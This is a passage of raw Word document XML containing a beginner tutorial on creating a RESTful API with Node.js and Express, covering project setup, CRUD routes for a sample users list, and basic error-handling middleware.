          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Layered System</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: REST allows an API to be structured in layers, improving scalability and manageability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0ABD20" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How to Create a RESTful API Using Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A064A6B"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rPr>
        <w:t>To create a RESTful API in Node.js, we’ll use the Express framework, which simplifies the process of building APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E61C3E2" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 1: Set Up a New Node.js Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A4AD36" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Initialize the Project</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B684A1E" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8"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mkdir rest-api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF029BB" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8"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cd rest-api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7DB3B0"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highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>npm init -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23634F17"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rPr>
        <w:t>This will create a package.json file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DDEB44" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Install Express</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CCF1A5"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highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>npm install express</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165EFC5E" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 2: Create the Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5504692E" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Create an index.js File</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D5ACA5" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8"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express = require('express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D29A2" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8"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app = express();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442F0B5" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8"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port = 3000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77194D2E" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20B2E077" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8"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Middleware to parse JSON bodies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0959E75C" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8"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app.use(express.json());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D7BC1" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755171F4" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8"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app.listen(port, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508D8B7C" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8"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console.log(`Server running on http://localhost:${port}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612CF8F9"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15585C00" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Run the Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54955CA2"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highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>node index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010F9264"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rPr>
        <w:t>Your server is now running on http://localhost:3000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6FAA25" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 3: Define Routes for the API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDF208A"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rPr>
        <w:t>Let’s create a basic RESTful API for managing a list of users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF01DEF" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Set Up the Routes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F61904C"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users = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE9648A"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id: 1, name: 'John Doe', email: 'john@example.com' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C2CD10"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id: 2, name: 'Jane Doe', email: 'jane@example.com' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C41AADE"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E44C823"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4FBEB71D"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GET /users - Get all users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6283A98D"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app.get('/users', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C7424"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res.json(users);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D074D4"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01EA448"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2915200"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GET /users/:id - Get a user by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C03766E"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app.get('/users/:id', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE34F26"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user = users.find(u =&gt; u.id === parseInt(req.params.id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6041F1"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(user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CE8BED"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res.json(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DAC09E"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1A1C25BF"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res.status(404).send('User not found');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E0DAA4"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1309FA5"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1693D28"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7D5BF48E"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POST /users - Create a new user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC1ECC3"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app.post('/users', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A4D45F"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newUser = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7374310D"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id: users.length + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8AB92E"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req.body.name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF047C"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email: req.body.email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238BDCAB"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79D5ADF"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users.push(newUser);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB3F32D"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res.status(201).json(newUser);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64850134"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D8C0B78"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60A0E3CB"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PUT /users/:id - Update a user by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174FBD7D"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app.put('/users/:id', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6925169C"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user = users.find(u =&gt; u.id === parseInt(req.params.id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE15356"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(user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3546DCF7"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user.name = req.body.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A97B795"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user.email = req.body.email;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296AD6C0"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res.json(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BD54E7"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346ECA88"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res.status(404).send('User not found');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195C881F"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DDEC709"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6865978"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B232915"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DELETE /users/:id - Delete a user by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEBF852"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app.delete('/users/:id', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA25EFE"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users = users.filter(u =&gt; u.id !== parseInt(req.params.id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09232432"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res.status(204).send(); // No content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243057A0"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D9E5736" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Test the API</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: You can test the API using tools like Postman, Insomnia, or curl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E849465"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3DE88A" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Get all users</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: GET http://localhost:3000/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350EEE18" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Get a specific user</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: GET http://localhost:3000/users/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D0E138" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Create a user</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: POST http://localhost:3000/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2697CA86"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8414249"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"Alice Smith",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A98A88F"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"email": "alice@example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D875F12"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D572FAC" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Update a user</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: PUT http://localhost:3000/users/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDF2BAA"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F9B1C55"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"John Doe Updated",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9AC138"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"email": "john.updated@example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F3611B"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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE101AE" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Delete a user</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: DELETE http://localhost:3000/users/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390A44E1" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 4: Add Middleware and Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A014F51" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Handling Middleware</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4BF1EE"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588CE65D"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console.error(err.stack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306E72C0"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res.status(500).send('Something broke!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1834F7FC"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31A35EB" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>404 Not Found Handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B373043"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app.use((req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F434EC9"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res.status(404).send('Not Found');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743243B1" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE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75BD2DD" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
